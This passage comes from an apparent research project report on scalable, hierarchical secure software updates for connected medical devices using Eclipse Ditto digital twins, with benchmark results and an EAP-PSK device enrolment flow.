assigned devices. The number of parallel processes per adapter is configurable, allowing fine-grained control over concurrency levels based on hardware resources and network conditions.

The Eclipse Ditto platform plays a central coordination role throughout this process. Desired state changes (e.g., setting the target software version) are written to each device's DT. As the individual devices report back their current state, the backend continuously checks for convergence between desired and reported values, allowing for real-time tracking of update success and automatic retry on failure.

The current implementation has been validated on testbeds simulating medium to large IoT deployments, including a mix of physical and virtualised devices. Initial benchmarks indicate a substantial reduction in end-to-end update latency (by as much as 70% in some configurations, as it will be shown in the experimental evaluation below) compared to sequential rollout. Furthermore, the modular design of the adapter layer makes the system extensible to more sophisticated batch scheduling strategies in the future, such as prioritised updates or location-aware load balancing.

This parallel and batched update model, rooted in DT queries and contextual metadata, significantly improves the scalability and responsiveness of the SSU Engine. It also lays the groundwork for further optimisation techniques, such as dependency-aware update planning and congestion-aware backoff mechanisms, which are currently under exploration.

4.2.2 Hierarchical software updates from high-end device to low-end devices

In real-world medical environments, not all CMDs are directly reachable from the central infrastructure due to security, architectural, or connectivity constraints. In the ENTRUST project, for instance, low-end sensors such as wearable ECG monitors, Bluetooth-enabled panic buttons, or USB-connected fall detection cameras are often connected indirectly via high-end gateways. These gateways act as communication bridges and trust anchors for the attached low-end devices. Hierarchical software updates address this reality by enabling software artefacts to be relayed from the SSU engine to a reachable proxy (e.g., the gateway), and from there to the final device. This approach allows the system to maintain full update coverage, even when operating in partitioned or resource-constrained environments. It also enhances fault isolation, as updates can be staged and validated at each hop, ensuring resilience and traceability across the chain of devices.

This situation is common in real-world cyber-physical systems, where devices rarely operate as isolated, stand-alone entities. Instead, they function as parts of interconnected systems-of-systems, where complex devices often rely on interactions with simpler, subordinate components. For instance, a high-end, Internet-connected gateway may act as a communication proxy or security anchor for a set of low-end sensors or actuators that lack direct Internet access. This is inline with ENTRUST' classification of CMDs into high-end and low-end devices. To enable granular control, traceability, and security management, each device regardless of its role or capability should have its own distinct DT. This allows for the separation of concerns in managing and monitoring devices while also supporting fine-grained operations such as targeted software updates, contextual risk assessment, and lifecycle management.

To capture such interdependencies, DTs should be modelled following a systems-of-systems approach [6, 52], explicitly encoding relationships such as delegation, containment, or proxying. In our work, we propose introducing semantic linkage between twins through the properties `proxyFor` (on high-end twins) and `proxiedBy` (on low-end twins). This supports bidirectional navigation of the dependency structure, enabling advanced queries and reasoning over device fleets.

Crucially, the resulting network of interconnected twins must remain parsable – that is, it should be computationally traversable and interpretable by the system. Regardless of how expressive the underlying

modelling language is (e.g., Eclipse Ditto's Web of Things data model), the structure must lend itself to graph-based representation and traversal. In practice, this means treating the DT ecosystem as a dynamic, evolving graph, where nodes represent individual devices and edges represent operational or logical relationships. This approach enables scalable, context-aware operations across device fleets and provides a foundation for future extensions involving policy propagation, delegation of trust, and autonomous orchestration across interconnected digital assets.

A critical aspect of composite DTs is the ability to traverse the interconnected DT graph efficiently. This traversability ensures that system-wide analyses, such as impact assessments or optimization routines, can be conducted effectively. Graph-based data representations are particularly suited for this purpose, as they naturally model relationships and dependencies among components [44].

The benefits of such hierarchical modelling include:

- **Connectivity bridging:** Update reachability is extended to low-end devices through one or more proxy hops.
- **Load balancing:** Update workloads are distributed across intermediate proxy devices, reducing central bottlenecks.
- **Resilience:** The multi-hop design provides fault-tolerance against temporary network partitions or node unavailability.
- **Contextual enforcement:** Updates respect semantic relationships encoded in the DT model, such as administrative zones, trust boundaries, or physical topology.

4.2.2.1 Implementation Rationale and Comparison to the State of the Art and Practice

To address the practical needs, our implementation models such trust-mediated update delegation using hierarchical relationships between DTs. Specifically, we introduced structured properties such as `proxyFor` and `proxiedBy` to represent explicit associations between gateway twins and the twins of their dependent low-end devices. These relationships are maintained in an acyclic graph structure to ensure reliable traversal, update propagation, and failure recovery.

While the concept of composite digital twins is not new, having been established in prior work to model complex cyber-physical systems and systems-of-systems architectures [10, 18, 52], our approach is novel in how it applies this paradigm to the secure delivery of software updates. Previous research has predominantly focused on the use of composite twins for synchronisation, simulation, or diagnostics. In contrast, we repurpose these hierarchical structures as active conduits in an update delivery pipeline, leveraging their interconnections to guide the relaying of update artefacts from one device to another.

From an architectural perspective, this integration of DT semantics with SSU logic enables a flexible and secure means of propagating updates through device chains, supporting both direct and indirect delivery strategies. Moreover, by explicitly encoding these relationships at the data model level, we are able to perform reasoning, traversal, and policy enforcement directly over the twin graph. For instance, update relays can be validated based on trust score thresholds, proxy device uptime, or environmental constraints represented in the contextual metadata.

Compared to traditional orchestration platforms or software deployment systems that assume flat or uniformly connected device fleets, our approach introduces semantic granularity and infrastructure awareness. This makes it particularly well suited for secure, large-scale deployments across heterogeneous

and partially disconnected environments, such as the one operated by Tellu in their remote patient monitoring system – a highly distributed network of connected gateways with various attached sensors. In summary, while the foundational ideas of twin hierarchies and system-of-systems modelling have been present in the literature, the ENTRUST implementation demonstrates their effective reuse and extension for secure software update delegation. This establishes a new, practical use case for composite DTs that goes beyond passive monitoring and aligns with the trust-aware, policy-driven architecture of modern IoT ecosystems.

4.2.2.2 Implementation: Composite Digital Twins with Acyclic Relationships in Eclipse Ditto

To support the modeling of complex, hierarchical IoT systems within our SSU framework, we extended Eclipse Ditto’s DT model to include structured, composite representations of devices. A primary design goal was to ensure that the resulting graph of twins remains acyclic and navigable, particularly for use cases involving hierarchical software update delegation.

In our implementation, each DT is extended with directional properties that encode parent-child relationships. Specifically, high-end DTs (such as gateways) expose a `proxiesFor` feature, which lists identifiers of the lower-end devices they serve. Conversely, each low-end twin includes a `proxiedBy` reference that links it to its respective gateway. This unidirectional modeling, exemplified in Table 4.1, ensures that the logical graph formed by all twins is oriented and avoids the pitfalls of symmetric or bidirectional linkage, which may otherwise result in cyclic dependencies.

High-End Twin (Gateway)	Low-End Twin (Sensor)
<pre> { "thingId": "gateway-001", "features": { "proxyFor": { "properties": { "devices": ["sensor-101", "sensor-102"] } } } } </pre>	<pre> { "thingId": "sensor-101", "features": { "proxiedBy": { "properties": { "gateway": "gateway-001" } } } } </pre>

Table 4.1: Example representation of proxy relationships between high-end and low-end DTs.

Cycle prevention is implemented at the data ingestion point, where we employ Ditto’s native RQL to perform pre-write checks before inserting or modifying any proxy relationships. When a relationship is proposed (e.g., linking device A to device B as a proxy) we perform a dynamic lookup to determine if the reverse link or any inferred transitive path already exists. If such a cycle is detected, the update is rejected to maintain graph integrity.

Schema-level constraints are also enforced through Ditto’s JSON schema validation. These include semantic restrictions such as allowing only high-end DTs to appear as `proxiedBy` targets, and limiting `proxiesFor` to only accept low-end device types. These type-level constraints reduce the risk of model

misuse and maintain semantic separation of responsibilities. By combining structured modeling conventions, real-time validation, and schema constraints, we have successfully implemented a scalable and acyclic DT infrastructure on top of Eclipse Ditto. This infrastructure not only enables traversable graph-based queries but also supports reliable delegation of software updates across hierarchical device networks.

This enhanced modelling of DT underpinned the technical implementation of the hierarchical software update as an extension to the previous version of the SSU Engine reported in D3.2. More specifically, the implemented pipeline is the following:

I. Twin-Level Routing via Recursive Proxy Traversal The process begins with the identification of a target device using a query written in Eclipse Ditto's RQL. The query can filter devices by various contextual properties, such as software version, model, location, or role. Once a target DT is matched, the system examines whether it includes the `proxiedBy` property.

- If the device does **not** include a `proxiedBy` reference, it is assumed to be directly reachable. In this case, the software update is delivered via the standard adapter pathway, as described in D3.2.
- If the device **does** include a `proxiedBy` reference, then it is considered to be dependent on another device for update delivery. In this case, the system recursively resolves the proxy chain by following the sequence of `proxiedBy` references until a directly reachable device (typically a gateway) is found. This recursive lookup constructs a full update path from the root device to the final target.

Because each device in the proxy chain has its own DT, the resulting path can be programmatically constructed and traversed as an acyclic graph. The architecture prevents loops through schema enforcement and cyclic dependency checks, ensuring that the proxy chain is valid and deterministic.

II. Update Handoff via Adapter Chain Forwarding The adapter infrastructure, originally introduced in D3.2, has been extended to support this recursive update propagation model. Each adapter now accepts an optional update message that includes a `hierarchicalForwarding` flag, a current position indicator, and the full update path (i.e., the ordered list of device IDs to be traversed). When an adapter receives such a message, it performs the following logic:

1. If the current device is the **last** element in the update path, the adapter proceeds with the installation of the software update locally. This involves downloading the package (if not pre-fetched), verifying its authenticity, and deploying it to the local runtime environment (e.g., via Docker, system package manager, or binary replacement).
2. If the current device is an **intermediate** node in the proxy chain, the adapter identifies the next device in the path and forwards the update message accordingly. This message passing is handled securely and reliably through inter-device communication protocols (e.g., MQTT, local sockets, or custom secure APIs).

4.2.3 Updated Architecture

The updated conceptual architecture of the SSU Engine incorporates two significant enhancements that improve its scalability and flexibility in heterogeneous IoT environments.

First, the system now supports *context-aware batching and parallel execution*, allowing the update process to dynamically group devices based on shared contextual properties, such as location, device type, or communication protocol, and execute updates across these batches in parallel. This enables the SSU engine to scale efficiently to fleets comprising hundreds or thousands of devices without overloading shared infrastructure.

Second, the architecture introduces native support for *hierarchical software updates*, enabling update propagation across chains of devices where low-end or indirectly connected devices receive their updates through trusted high-end proxies. This is achieved by extending the digital twin data model with `proxyFor` and `proxiedBy` properties, and by modifying the adapter subsystem to support recursive, multi-hop update forwarding. The resulting architecture remains fully aligned with the Trusted Computing Group Secure Software Update lifecycle, while extending its operational reach and robustness in constrained, real-world deployment settings. Figure 4.1 illustrates the enhanced SSU architecture with the new components and data flows introduced by these capabilities.

Figure 4.1: High-level SSU architecture in ENTRUST with support for hierarchical updates.

4.2.4 Updated Operational Flows

Figure 4.2: Updated operational flow of the SSU process, including two extensions: scalability through grouping & batching, and hierarchical software updates.

4.2.4.1 Grouping and Batching

Figure 4.2 presents an updated sequence diagram of the batched and parallelised update process, including key actors such as the SSU Engine, DT Platform, Adapters, and the target CMDs. It illustrates the lifecycle from initial query execution to concurrent adapter execution and final verification.

This operational flow enables our SSU architecture to support the secure, efficient, and context-aware delivery of updates at scale. By embedding batching and parallelisation natively into the update process, rather than relying solely on infrastructure-level orchestration tools, we retain full semantic control over grouping logic and update policies. This ensures that both performance and trustworthiness requirements are met even under high operational loads.

The operational flow begins with the initiation of a software update event, either triggered manually by the system administrator or automatically in response to a detected trust violation, policy enforcement rule, or vulnerability disclosure.

1. Target Device Selection The SSU engine first constructs a target set of devices that should receive the update. This selection is made via RQL queries over the DT platform. As previously discussed, queries may filter devices based on software version, device model, location, connectivity type, or trust score, among other contextual properties.

2. Batching by Contextual Properties The target set is then partitioned into batches. Each batch consists of devices that share one or more contextual properties – for instance, devices located in the

same hospital, devices connected over the same interface type, or devices requiring the same update package. The batching logic is configurable and extensible, allowing new grouping strategies to be added based on deployment needs. This batch structure reduces the risk of overloading shared infrastructure (e.g., network segments or storage services), while enabling parallel execution and fine-grained progress tracking.

3. Parallel Dispatch and Adapter Instantiation Once batches are formed, the SSU engine instantiates a dedicated *adapter instance* per batch. These adapter processes run in parallel and are responsible for managing the update delivery to their respective subset of devices. Each adapter uses a lightweight concurrency framework to initiate multiple update sessions concurrently. These sessions handle downloading the update artefact, verifying integrity, deploying the update to the device, and monitoring success or failure. The number of concurrent sessions per adapter is configurable and may be adjusted dynamically based on system load or policy constraints.

4. Monitoring and Completion Throughout the execution, the DT platform is updated in near real-time as devices transition from old to new versions, as reflected by the synchronisation of desired and reported software version properties.

4.2.4.2 Hierarchical Software Updates

Figure 4.2 also illustrates the operational flow of a hierarchical software update. It depicts the roles of the SSU Engine, DT Platform, Adapter Chain, and the proxy-resolved path from source to target. The diagram emphasises update message propagation, forwarding logic, and installation checkpoints across multiple devices. This hierarchical routing strategy enables the SSU engine to extend its reach to devices that would otherwise be inaccessible.

1. Target Selection and Proxy Detection The update process begins with the SSU engine executing an RQL query against the DT platform to identify the set of devices that require a software update. Once the target set is constructed, each DT is examined individually to determine whether it is directly reachable or if it is proxied by another device.

2. Recursive Proxy Path Resolution For twins that declare a `proxiedBy` relationship, the SSU engine performs a recursive graph traversal along the proxy links until it reaches a device that has no such reference, typically a high-end gateway capable of receiving updates directly. The resulting path defines the update chain from root to leaf, which is passed along with the update payload for execution. Cycles in the proxy graph are avoided through schema validation and cycle-detection safeguards.

3. Update Dispatch and Adapter Handoff The constructed update path is dispatched to the adapter associated with the root proxy device. Each adapter in the chain now includes logic to inspect whether the current device is the final target in the update path.

- If the device is an intermediate proxy, the adapter validates the integrity of the next hop and forwards the update message accordingly.
- If the device is the final recipient, the adapter performs the actual installation of the software update.

Each forwarding action includes validation of the remaining path and ensures the update is not tampered with during transfer.

4. Error Handling and Monitoring At every stage of the update chain, failure handling is integrated. If a proxy device is offline or unresponsive, the update process enters a pause-retry cycle governed by exponential backoff. Intermediate progress is tracked by updating the DT's `reported` properties, which allows for automatic resumption and auditability. If an adapter in the middle of the chain fails, recovery can be initiated from the last successful checkpoint in the proxy chain.

4.3 Empirical Evaluation of Scalability

To assess the practical viability and performance of the updated SSU engine under large-scale conditions, we conducted an empirical evaluation focusing on the scalability of the new batching and parallel execution mechanisms. The evaluation was designed to simulate a real-world update rollout across a fleet of 100 devices and compare different execution strategies in terms of both latency and resource usage. These 100 devices are intended to represent physical high-end CMDs, such as connected healthcare gateways used by Tellu. In practice, these gateways are embedded computing platforms, comparable in capability and complexity to Raspberry Pi boards, used to process patient data, host monitoring agents, and manage secure software components. Although our experiments were conducted using lightweight software simulations of these gateways, the logic, communication, and update workflows closely mirrored those of real deployments. This allowed us to meaningfully assess the system's ability to scale while maintaining performance expectations aligned with healthcare-critical infrastructure.

4.3.1 Research Questions

To ensure the practical applicability of the proposed enhancements to the SSU engine, it is essential to evaluate not only their theoretical advantages but also their operational behaviour under realistic load. In the context of the ENTRUST project, where large fleets of CMDs must be managed securely and efficiently, the capability to scale software update operations is crucial. These devices often operate in constrained or distributed environments, such as healthcare facilities or mobile infrastructure, where timely update delivery, minimal disruption, and controlled resource usage are all critical.

The benchmarking experiments, reported in this subsection, were therefore designed to address two research questions, aimed at understanding the trade-offs introduced by parallel and batch-based execution. Specifically, we aim to answer the following research questions:

RQ1: What are the computational and latency overheads introduced by different batching and parallelisation strategies?

RQ2: Which setup offers the most practical trade-off between execution time and resource consumption?

4.3.2 Experimental Testbed

All experiments were conducted on a dedicated high-performance server with the following specifications:

- **CPU:** Intel Xeon W9-3475X @ 4.6GHz (36 physical cores)

- **Memory:** 512 GB RAM
- **GPU:** 2 × Nvidia RTX 6000 ADA (48 GB each)
- **Storage:** 2 × 4TB PCIe SSD + 1 × 12TB SATA (7200 rpm)

To isolate and stress-test the software update mechanism, all 100 target devices were simulated using lightweight software containers that emulated the behaviour of physical CMDs. Each simulated device maintained a DT and could respond to update commands via a local interface.

In our benchmarking setup, we will measure the execution latency of several discrete operations involved in the SSU process, with a focus on computational performance excluding network overheads. Latency was recorded in milliseconds and captured for key steps such as target device selection, batch creation, adapter instantiation, update dispatching, and software installation. To ensure precision, we embedded timestamp checkpoints directly in the source code, recording the system time immediately before and after each operation. The difference between these timestamps yielded the execution duration for each step. This approach enabled us to obtain fine-grained, reproducible performance metrics while isolating the internal behaviour of the system from external variables such as network delays.

4.3.2.1 Evaluated Setups

We compared the following three execution setups:

1. **Single adapter for a single device:** a baseline where a single adapter instance handles a software update on a single device. All other setups will be evaluated against this baseline.
2. **Single adapter for 100 devices:** One adapter instance sequentially handled all 100 target devices.
3. **Fully parallel 100 adapters:** Each of the 100 devices was handled by its own dedicated adapter running in parallel (i.e., 100 parallel processes).
4. **Batch-based execution with 10 adapters:** Devices were grouped into 10 batches of 10 devices, and each batch was handled by its own adapter (i.e., 10 adapters running in parallel).

4.3.2.2 Evaluation Benchmarks

We have adopted a similar evaluation strategy as reported in D6.1. We broke down the overall SSU cycle into three key steps – **Robust Distribution**, **Secure Installation**, and **Post-Install Verification**. Within each step we also identify 2 operations which we benchmark. All these steps are executed by distinct software components located across different network environments. Understanding how these components interact and distribute computational tasks is crucial for assessing the system’s performance and its efficiency.

Figure 4.3: A break-down of operations in the Robust Distribution step.

Robust distribution ensures that software updates are assigned and delivered to the correct devices. This process involves two main components: the **Assignment Engine** and the **Digital Twin Platform**. The Assignment Engine determines which devices require updates by analysing their DT data. It decides the scope of the update, e.g., targeting specific devices or broad deployment. The process is divided into two key operations:

1. **Assignment of Updates** (Benchmark 1 in Figure 4.3): The SSU process is initiated when an external MQTT message (e.g., an MSPL file from the MUD manager) is received. This message contains details about the update, such as the SW/FW image name, version, and source URL, along with the conditions defining which devices are affected (e.g., specific device models or outdated software versions). The message is parsed, and the extracted update details are stored in the DT Platform. Once the information is persisted, the Assignment Engine queries the DT database to identify matching devices that require the update.
2. **Distribution of Updates** (Benchmark 2 in Figure 4.3): After identifying affected devices, the DT Platform updates their desired properties with the new SW/FW version. This change creates a discrepancy between the desired and reported properties, which acts as a trigger for the update process. **Group and Batch!** The platform then sends MQTT messages to the Subfleet Manager, specifying the devices that need to be updated and the required SW/FW version. These messages ensure that the update process moves forward to the Secure Installation phase.

Figure 4.4: A break-down of operations in the Secure Installation step.

Secure Installation ensures that updates are applied securely and in a device-specific manner. This step relies on the **Subfleet Manager** and the **Adapter(s)** to route the update requests and execute the installation process. The process is divided into two main operations:

1. **Routing of Updates** (Benchmark 3 in Figure 4.4): The **Subfleet Manager** receives an MQTT message from the DT Platform containing the update request. It then parses this message to extract key information, such as the target platform, device-specific interface, and connection details (e.g., IP address and port of the Docker Engine API). The Subfleet Manager performs grouping and batching based on the shared contextual properties for workload balancing. Once batches are formed, a dedicated adapter is instantiated for each batch. These adapter processes run in parallel and are responsible for managing the update delivery to their respective subset of devices.
2. **Launching Container** (Benchmark 4 in Figure 4.4): The **Adapter** takes over and first establishes a connection to the target device using the appropriate API or interface. It then executes the installation by launching the new SW/FW version as a Docker container on the device. This installation process involves multiple handshakes to ensure the update is applied correctly and securely. Once the installation is complete, the Adapter receives an acknowledgment confirming the successful deployment of the update.

Figure 4.5: A break-down of operations in the Post-Install Verification step.

Post-install verification This step ensures that the update has been successfully applied and that the device is functioning as expected. This step involves two main operations:

1. **Run-Time Status Monitoring** (Benchmark 5 in Figure 4.5): The **Tracer** runs on the device and is configured to periodically collect key runtime metrics. These include the status of the Docker Engine and the containers running on the device (e.g., container status, version, and uptime). The collected metrics are then transmitted via MQTT to the Digital Twin Platform, ensuring continuous visibility into the device’s post-update state.
2. **Synchronisation of DTs** (Benchmark 6 in Figure 4.5): The DT Platform receives MQTT messages from the Tracer and processes the reported telemetry data. Each message is parsed and mapped to the corresponding DT in the system. The reported properties of the twin are then updated accordingly. If the reported software version and status match the desired properties previously assigned during the update process, the update cycle is considered successfully completed.

4.3.3 Experimental Results

For each of the four setups, we repeated the experiments multiple times (10+) to produce average values for each of the execution steps within the SSU process. These results are summarised in Table 4.2 and in the bar chart in Figure 4.6.

4.3.4 Discussion of Benchmark Results and Research Questions

RQ1: Overheads of Different Strategies Among all measured execution phases, the most time-consuming operation was Launching containers on devices, corresponding to the Secure Installation step of the Trusted Computing Group update lifecycle. This step involves starting the updated Trust Agent (as a Docker container) on each CMD. In Setup 2, where a single adapter processes all 100 updates sequentially, this operation took over 30 seconds, clearly illustrating the bottleneck of serial execution.

In contrast, the **fully parallel setup** (Setup 3), which spawns 100 adapter instances to update 100 devices simultaneously, yielded much faster total execution time. However, it also resulted in near-saturation of CPU and memory resources on the server. This high resource usage limits the applicability of such a setup in constrained environments, such as edge gateways or shared hospital servers.

Operations performed on the server side – namely, Assignment and Distribution of Updates, as well as Synchronisation of DTs (Benchmarks 1, 2 and 6) – were completed quickly and consistently across all configurations. This performance stability is attributed to the use of Eclipse Ditto and its highly optimised RQL engine, which benefits from internal parallelism and efficient memory management. Additionally, the evaluation server featured high-end hardware that minimised contention.

Step	Benchmarked operation	Involved component	Network location	Setup 1	Setup 2	Setup 3	Setup 4
Robust Distribution	Benchmark #1: Assignment of updates	Assignment Engine	Cloud server	107	123	120	120
	Benchmark #2: Distribution of updates	DT Platform	Cloud server	97	281	275	277
Secure Installation	Benchmark #3: Routing of updates to devices	Subfleet Manager	Domain manager on the local network	51	53	507	217
	Benchmark #4: Launching containers on device	Device-specific adapter(s)	Domain manager on the local network	2834	32537	4876	3105
Post-Install Verification	Benchmark #5: Run-time status monitoring	Tracer	Connected medical devices	2705	3187	3381	3295
	Benchmark #6: Synchronisation of DTs	DT Platform	Cloud server	56	78	81	79
TOTAL				5850	38337	9321	7093

Table 4.2: SSU scalability benchmarking: execution latency throughout the SSU cycle (in milliseconds).

Figure 4.6: Execution latency throughout the SSU cycle (in milliseconds).

It is worth noting that in Setup 3, the benefits of full parallelism begin to diminish due to server saturation. Each of the 100 simulated devices, running alongside their adapters on the same host, competed for CPU, memory, and I/O. This contention slowed down the very step (container launching) that parallelisation sought to accelerate. In contrast, Setup 4 (batch-based execution) with 10 adapter instances offered near-parallel performance while avoiding extreme resource consumption.

Finally, the fifth benchmark, Run-time status monitoring, was affected by the tracer’s polling interval.

Since the agent is configured to detect and report new software versions every 5 seconds, there is an inherent 2–3 second delay in detecting successful installations, which appears uniformly across all test scenarios.

RQ2: Practical Trade-Offs The batch-based configuration (Setup 4) emerged as the most balanced solution. By grouping the 100 devices into 10 batches of 10 and assigning one adapter per batch, this setup achieved significant reductions in execution time compared to serial execution while avoiding the overheads of launching 100 concurrent processes. This configuration also allows more granular control over concurrency levels, enabling administrators to tune the degree of parallelism based on network conditions, hardware limitations, or trust-based priorities.

Given the need to deploy SSUs across various medical contexts, ranging from hospital networks to mobile patient transport units, flexibility and predictability are as critical as raw speed. The batch-based approach supports this need by enabling controlled and reliable update rollouts that do not compromise the performance of shared infrastructure or overwhelm the devices themselves.

In conclusion, our benchmarking results validate that the enhanced SSU engine can support both high-throughput and resource-sensitive environments. The use of batching and controlled parallelism ensures that software updates can be scaled effectively across heterogeneous fleets of devices, making the system suitable for wide adoption in mission-critical IoT applications.

4.4 Roadmap

The experimental results presented in this section have provided valuable and promising insights into the scalability and efficiency of the updated SSU engine. The benchmarking performed in a controlled, high-performance environment confirmed that both the batching and hierarchical update mechanisms are functionally correct and capable of supporting large-scale device management scenarios. The batch-based execution strategy, in particular, demonstrated an effective balance between execution time and resource consumption, while the hierarchical forwarding mechanism offers a flexible solution for updates across topologically constrained device networks.

However, for a complete and conclusive validation, it is essential to evaluate these mechanisms under real-world conditions. Specifically, we aim to integrate and test the full SSU pipeline within the operational environments of the two primary project pilot sites: **Tellu** (connected healthcare gateways) and **Polaris** (intelligent patient transport infrastructure). These pilots offer heterogeneous device fleets, varied network conditions, and domain-specific trust policies, making them ideal testbeds for validating performance, robustness, and contextual compatibility of the SSU Engine in situ.

The deployment of these enhancements into the pilot environments is planned as part of the upcoming integration phase of the project. The results of this real-world evaluation, including runtime logs, qualitative feedback from operators, and detailed performance metrics, will be documented in the forthcoming **Deliverable D6.2 [29]**. This will serve as a final validation step and provide the basis for future refinements, optimisations, and exploitation strategies.

Chapter 5

CMD Authentication Flow with EAP-PSK

As part of the secure enrolment phase in ENTRUST which entails the actions required for the **registration of CMDs into the medical organisation** and the **generation of the required cryptographic material and keys**, the **Device Authentication Flow** plays a critical role. *This flow ensures that only legitimate devices can join the ENTRUST domain and begin secure operation, serving as a crucial step that enables CMDs to access and utilize the security enablers provided by ENTRUST.* It addresses the challenge of **verifying new devices in a scalable and secure manner** by employing **EAP-PSK (Pre-Shared Key Extensible Authentication Protocol)** a process that was initially presented in Deliverable D3.1 [24], when a new device attempts to join an ENTRUST domain. **This section provides the final version**, incorporating an updated definition of the components involved in the process (such as the Domain Manager or MUD Manager), the protocols used, the final flow diagram, and the initial evaluation plan, along with preliminary benchmarking results obtained from local tests, which **serve as a foundation for the implementation path** that will be detailed in D6.2.

As previously detailed in Deliverable D3.1, the **secure enrolment process** of the Connected Medical Device (CMD) into the ENTRUST domain **is divided into two sub-phases**: (i) **The first sub-phase** involves the **authentication of the CMD to the Domain**, with the goal of **obtaining the Master Session Key (MSK)**, which will be used to **derive new service-specific keys** for future **secure communication** between components, such as **retrieving MUD File from manufacturer's server**. (ii) **The second sub-phase** includes **the steps required for the CMD to obtain its verifiable credentials**, which will be used to provide trustworthiness evidence during runtime in a **verifiable manner** in the context of the **Trust Assessment process**. In this section, **we focus on the first phase**, which involves the **device authentication flow using EAP**. Additionally, it enables the **secure retrieval and processing the MUD protection profiles**, which are critical as they serve **as the foundation to define the security requirements** of the device, outlining the **necessary operational characteristics** in order to **mitigate threats** and ensure safe interaction within the **network infrastructure of the ENTRUST domain**.

For **EAP authentication** within the **ENTRUST domain**, *the EAP-PSK method was selected due to its lightweight nature, suitability for high-end devices with the capability for the execution of more computationally intensive operations* (such as gateway devices), and its ability to provide mutual authentication and session key derivation. **EAP-PSK enables mutual authentication and session key derivation** between the CMD and the DM using a **symmetric Pre-Shared Key (PSK)**. This **PSK is securely provisioned by the CMD manufacturer** and is **installed during the phase prior to its deployment** in the ENTRUST domain.

On the other hand, *the integration of MUD with EAP enhances the management of CMDs by combining secure device authentication with protection profiles.* This integration ensures that **only authenticated devices** can join the **ENTRUST domain**, while **MUD protection profiles** define and **restrict the CMD's**

behaviour to mitigate threats and ensure safe interaction within the network. As a result, the ENTRUST domain becomes more secure, providing a robust environment for CMD operations.

5.1 EAP Action Workflow

When a **new CMD is deployed within an ENTRUST domain**, it begins by sending a request to the DM. This initial request enables the DM to trigger one of several potential **bootstrapping or enrolment processes**, depending on the interaction context. In our case, this involves **EAP-PSK authentication method**. As part of this first request, the device **sends its MUD URL**, which was **pre-installed during the manufacturing phase**.

After the **Manufacturing phase** is complete, the device can be **deployed to the medical domain infrastructure** where it is intended to operate, thus initiating the **Pre-Deployment(Domain-Specific) phase**. In this phase, the **EAP authentication process formally begins** when the device is booted up. The process is initiated by **DM(EAP Authenticator)** when it receives the first request from the **CMD(EAP Peer)**. At this point, the DM sends back an **EAP-Request/Identity** message to the CMD. The **CMD responds with its identity**, which the **DM forward to the manufacturer's AAA Server(EAP Server)**, initiating the EAP-PSK messages exchange in Step 4.

However, since the authentication **relies on PSK known only by the device manufacturer**, the **DM delegates the authentication process** to the manufacturer's AAA Server (Step 5). This delegation ensures that the device is **authenticated using the PSK provisioned during manufacturing phase**. The Figure 5.1 shows a **diagram representing the secure enrolment process** of a CMD to the ENTRUST domain proposed.

Figure 5.1: Onboarding Phase

Once the manufacturer’s **AAA Server** receives the **identity**, it checks whether the device is **authorized**. If the identity is valid, the manufacturer’s AAA Server generates the **first EAP-PSK message (EAP-PSK-1)**. This message contains: a **16-byte random challenge (RAND_S)** that is used as a **session identifier** and the **server’s identity (ID_S)**.

The first EAP-PSK message (**EAP-PSK-1**) is passed from the manufacturer’s AAA Server to the **DM**, and finally delivered to the **CMD**.

Upon receiving the first message, the **CMD** stores the provided data and prepares the **second EAP-PSK message (EAP-PSK-2)**. This message contains: a **new 16-byte random challenge (RAND_P)**, the **CMD’s identity (ID_P)**, and a **Message Authentication Code (MAC) (MAC_P)** computed using the **pre-established Authentication Key (AK)**.

- $MAC_P = CMAC-AES-128(AK, ID_P || ID_S || RAND_S || RAND_P)$

As previously described in deliverable **D3.1**, the **Authentication Key (AK)** and the **Key-Derivation Key (KDK)** are **16-byte static long-lived subkeys** derived from the **PSK**. This derivation process, called **key setup**, is performed **only once**. These keys allow the **EAP peer (CMD)** and the **EAP server (manufacturer's AAA Server)** to **mutually authenticate**. Both parties identify the appropriate **AK** using their respective **Network Access Identifier (NAIs)** (**ID_P** and **ID_S**).

The **CMD** then sends this second EAP-PSK message (**EAP-PSK-2**) back through the **DM** to the **manufacturer's AAA Server**.

Once received, the **manufacturer's AAA Server** verifies the validity of **MAC_P** by performing the same **key derivation** and specific **MAC_P computation process**. If **MAC_P** does not match the expected value, it indicates a **key mismatch**, and the **authentication process fails**.

If the **MAC is valid**, the process continues with the creation of the third EAP-PSK message (**EAP-PSK-3**). This message includes: the **session identifier** (**RAND_S**) and a **MAC** (**MAC_S**) proving the **server's authenticity**:

- $MAC_S = CMAC-AES-128(AK, ID_S || RAND_P)$

Additionally, the message contains a **protected channel**(**PCHANNEL_S_0**) used to:

- **Confirm that the server has derived session keys** (e.g., the **TEK**(Traffic Encryption Key))
- **Provide a protected indication of the authentication result**.

The **third message** is sent back to the **CMD** via the same communication path. Upon receiving it, the **CMD verifies** **MAC_S** by computing its own version using the **Authentication Key (AK)**, the server's identity (**ID_S**), and the **CMD's** random challenge (**RAND_P**), and comparing the result to the received **MAC_S**.

Next, the **CMD** processes and checks the **PCHANNEL_S_0** field, which contains a **protected authentication result**. To decrypt it, the **CMD** must generate a **Traffic Encryption Key (TEK)**. If the **derived session keys are correct**, the **CMD** will successfully decrypt the **PCHANNEL** and **validate the result**. If the **keys are incorrect**, decryption fails, and the **authentication is terminated**.

Finally, if both **MAC_S** verification and **PCHANNEL_S_0** decryption are successful, the **CMD** proceeds to send the **fourth EAP-PSK message (EAP-PSK-4)**. This message includes: the **session identifier** (**RAND_S**) and the **PCHANNEL_S_1** to **confirm successful authentication** from **CMD's** side.

The goal of the **protected channel exchanges** is to check if the **CMD** and **manufacturer's AAA Server** have derived the same **MSK**. At the end of those exchanges, the **MSK** will be used for deriving **additional key material** used to access various services. When authentication succeeds, **steps 14 ensure the MSK is shared** between the **manufacturer's AAA Server** and the **DM**.

In **step 15**, the **DM** sends a message to the **MUD Manager** to retrieve the **MUD file** from the **URL pre-installed on the CMD**. The **MUD Manager** then sends a request to the **manufacturer's MUD Server** to obtain the file. Once the **MUD file** is received, the **MUD Manager** sends it directly to the **DLT**.

Completion: When the **MUD Manager** receives a confirmation from the **DLT**, it continues the process by sending a **confirmation to the DM**, who then sends a **success message to the CMD** to **finalize the enrolment process**.

Security assumptions: Outside of the above protocol, it is assumed that a **trusted communication channel** exists between all parties (the EAP model does not specify how this secure communication channel is established, as there are multiple possible approaches). Separately, the **PSK is securely installed** on the **CMD** in a way that prevents attackers from accessing it (e.g., by storing it in a **TPM**). Additionally, the **MUD file** is **generated by the manufacturer** alongside a **certificate** to ensure its **authenticity and integrity**.

